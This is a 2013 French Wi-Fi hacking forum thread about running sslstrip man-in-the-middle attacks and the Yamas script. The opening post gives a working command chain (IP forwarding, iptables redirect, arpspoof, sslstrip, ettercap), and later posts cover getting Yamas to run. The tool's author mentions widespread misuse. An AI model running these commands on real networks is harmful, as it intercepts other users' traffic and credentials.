Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 13-02-2013 14:29:52

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Port sslstrip

Bonjour à tous, je me lance dans le sslstrip, donc je rentre les "formules":

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

arpspoof -i wlan0 iprouteur (ou arpspoof -i wlan0 -t (target) (host))

python sslstrip.py -k -l 8080

ettercap -i wlan0 -T -q

Tout est en place, mais quand je lance mon autre ordinateur j'ai ça:

sslstrip.png

J'ai essayé sur le port 10000, 15000, 8080, 7777.
Mais je ne sais pas vraiment à quoi ils correspondent. Je voudrai savoir si un port pourrait être efficasse.

Merci d'avance

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 13-02-2013 21:22:22

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Port sslstrip

Salut wink


Je t'ai déjà donné une piste accessible et fonctionnant : ICI

Furyo a écrit :

Salut wink


Pourquoi ne pas utiliser Xplico ?

Tu veux absolument filtrer le SSL ?

Pour une attaque MITM, j'utiliserai le script Yamas dans ce cas wink


Le site est ici : http://comax.fr/yamas.php


Essaye wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#3 13-02-2013 21:38:10

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Port sslstrip

Ah oui j'y avais pas pensé, mais quand je tape "yamas" dans BT5 il ne le trouve pas. Tu pourrai me dire où il se trouve?

Edit: J'ai ouvert le fichier .sh et je l'ai copié dans un shell, ça a l'air de chercher, on verra si ça l'installe

Dernière modification par Anthonyy59 (13-02-2013 21:41:43)

Hors Ligne

#4 13-02-2013 21:53:17

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Port sslstrip

Anthonyy59 a écrit :

Ah oui j'y avais pas pensé, mais quand je tape "yamas" dans BT5 il ne le trouve pas. Tu pourrai me dire où il se trouve?

Edit: J'ai ouvert le fichier .sh et je l'ai copié dans un shell, ça a l'air de chercher, on verra si ça l'installe


Tu cliques droit sur le script et tu choisis 'Propriétés' puis tu selectionnes l'onglet 'Permissions' et tu coches la case 'Authoriser l'execution du fichier comme un programme'


Ensuite tu fermes et tu cliques dessus...




Allez, tu vas y arriver wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#5 13-02-2013 21:59:04

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Port sslstrip

J'ai réussi ! Merci à toi Furyo, je te tiendrai au courant quant à son utilisation.

Hors Ligne

#6 13-02-2013 22:02:03

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Port sslstrip

Anthonyy59 a écrit :

J'ai réussi ! Merci à toi Furyo, je te tiendrai au courant quant à son utilisation.


Bah, de rien wink


J'espère que tu saurras nous donner tes impressions wink




PS: tu verras que selon le naviguateur employé, tu as des différences wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#7 13-02-2013 22:05:52

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Port sslstrip

Tu avais raison, il est vraiment simple d'utilisation ! Et il est rapide a mettre en place, par contre j'ai toujours la meme page qui s'affiche sur mon ordi (l'impression écran que j'ai mi au départ), c'est sans doute le navigateur qui empêche d'accèder au site non?

Hors Ligne

#8 13-02-2013 22:09:20

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Port sslstrip

Vide le cache de ton naviguateur ou change de naviguateur wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#9 13-02-2013 22:17:07

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Port sslstrip

Je l'ai vidé mais le problème persiste, chrome est peut-être sécurisé, je te tiens au courant avec un autre navigateur wink

EDIT: Autant pour moi, il est très efficace, il fonctionne parfaitement, un grand merci a toi Furyo !

Dernière modification par Anthonyy59 (13-02-2013 22:24:28)

Hors Ligne

#10 28-02-2013 12:19:48

comaX
Nouveau membre
Inscription : 28-02-2013
Messages : 8

Re : Port sslstrip

Salut les gars, j'ai vu que vous parliez de Yamas, donc j'me suis dit que j'allais m'inscrire pour fournir un peu de support si besoin est. Content de voir que ça vous plaît !

Hors Ligne

#11 28-02-2013 12:23:12

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Port sslstrip

comaX a écrit :

Salut les gars, j'ai vu que vous parliez de Yamas, donc j'me suis dit que j'allais m'inscrire pour fournir un peu de support si besoin est. Content de voir que ça vous plaît !

Bienvenu comaX wink


C'est toi qui t'est amusé à faire, Yamas?


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#12 28-02-2013 17:19:35

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Port sslstrip

Si c'est toi qui a crée yamas, félicitation, personnellement j'adore, il est super simple d'utilisation !

Hors Ligne

#13 01-03-2013 04:02:41

comaX
Nouveau membre
Inscription : 28-02-2013
Messages : 8

Re : Port sslstrip

C'est en effet bien moi qui me suis "amusé"* à faire Yamas. Je suis très honnêtement ravi qu'une communauté francophone l'apprécie car depuis bientôt deux ans il me semble, je n'en ai pas souvenir.
En guise de "preuve" de mon identité, je vous dirais que j'ai trouvé cette page grâce à Google Analytics.
Ca fait bien des années que je connais ce forum, mais ne m'y étais pas inscris, faute d'intérêt puisque je m'étais arrêté au côté "crack wifi" que je maîtrise déjà.

*Je mets "amusé" entre guillemets parce que c'était autant de plaisir en amphi plutôt que d'écouter mon cours, que de souffrance et des nuits blanches à coder le bon "parser" pour afficher les résultats.

PS : Pour être tout à fait honnête, je n'ai pas fais attention s'il y avait une section présentation. Si tel était le cas, dites le moi simplement, et je le ferai.

Hors Ligne

#14 01-03-2013 09:46:19

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : Port sslstrip

Tu peux aller te présenter dans la section "présentation des membres"

Je ne m'y connais pas trop en création de logiciel mais j'imagine que ça n'a pas été facile !

Hors Ligne

#15 01-03-2013 10:21:59

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Port sslstrip

Salut comaX wink


J'ai pu apprécier ton travail, tres bien fait d'ailleurs wink


J'ai decouvert Yamas sur une release de test intégré sur une production de Wifislax. Apres de nombreux tests, j'ai pu apprécié l efficacité et la pertinence.


Pour cela, je te souhaite la bienvenue sur le forum et j espere que tu seras nous dire si prochainement yamas sera mis a jour ou pas.

En attendant, bonne naviguation wink


Ps : si tu vas faire un tour sur la communautée Xiaopan.co, tu verras que Yamas est demandé egalement sur la future release wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#16 01-03-2013 12:10:46

comaX
Nouveau membre
Inscription : 28-02-2013
Messages : 8

Re : Port sslstrip

Alors, niveau mise à jour, il y en a de prévues, de deux sortes :
- mise à jour de Yamas, avec notamment l'ajout de filtres ettercap pour modifier le trafique "on-the-fly".
- nouvelle version de Yamas (je pense l'appeler "yamas-pwn"), orientée plus agression, moins apprentissage. Ce sera Yamas, avec moins de blabla, moins de configuration. Le but c'est d'aller direct dans le vif. J'hésite encore ceci-dit, pour la simple raison que j'ai la farouche impression que beaucoup n'utilisent pas Yamas pour les bonnes raisons, malheureusement.

Le problème de la lenteur des mises à jour, c'est que j'ai une vie qui me prend beaucoup de temps entre les cours, le taff pour les cours, le taff pour manger, et les sorties avec les potes... Typiquement, ca sera mis à jour pendant les vacances, quand je peux réellement glander à mort.

Sinon, je n'avais aucune idée que Yamas était inclu dans des distribs, c'est assez incroyable !

Hors Ligne

#17 01-03-2013 12:29:29

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Port sslstrip

comaX a écrit :

Alors, niveau mise à jour, il y en a de prévues, de deux sortes :
- mise à jour de Yamas, avec notamment l'ajout de filtres ettercap pour modifier le trafique "on-the-fly".
- nouvelle version de Yamas (je pense l'appeler "yamas-pwn"), orientée plus agression, moins apprentissage. Ce sera Yamas, avec moins de blabla, moins de configuration. Le but c'est d'aller direct dans le vif. J'hésite encore ceci-dit, pour la simple raison que j'ai la farouche impression que beaucoup n'utilisent pas Yamas pour les bonnes raisons, malheureusement.

Le problème de la lenteur des mises à jour, c'est que j'ai une vie qui me prend beaucoup de temps entre les cours, le taff pour les cours, le taff pour manger, et les sorties avec les potes... Typiquement, ca sera mis à jour pendant les vacances, quand je peux réellement glander à mort.

Sinon, je n'avais aucune idée que Yamas était inclu dans des distribs, c'est assez incroyable !


Merci pour tes reponses et ton eclaircissement wink

Pour ton sentiment, je suis d'accord sur l'utilisation qui pourrait être faite de cet outil, ceci etant pour du pentesting et montrer (ou demontrer) les failles de securitée, je le trouve excellent wink


Bon courage donc pour tes etudes et l'eventualité de tes projets futurs wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#18 08-05-2013 17:29:49

alganx
Nouveau membre
Inscription : 18-12-2012
Messages : 9

Re : Port sslstrip

Bonjour à tous voilà j'ai besoin de votre aide j'essaye de faire un MITM + ettercap le problème étant que j'ai utiliser plusieurs méthode pour réussir mais aucun ne fonctionne arrivé à la fin lorsque par ex j'essaye d'intercepter des données le navigateur m'indique "impossible d'afficher la page" j'ai même essayer avec "yamas" tout ce passe bien mais au lancement de yamas ca me met

"chmod: cannot access '/usr/share/ssltrip/ssltrip.py no such file directory"

mais je peux encore contiuer jusqu'à la fin ensuite 2 fenêtre noir s'ouvre comme sur la photo et à ce moment la plus aucun PC de mon réseau n'a internet....

mini_535656Capture.jpg

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
5 1173 08-01-2016 17:19:27 par FritillaX
2 1163 02-09-2014 16:38:00 par flacono
7 1426 24-01-2014 02:47:38 par Fuji
3 918 11-01-2014 02:24:22 par barnaber91
7 1138 11-09-2013 20:20:51 par Rams3s

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.078 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]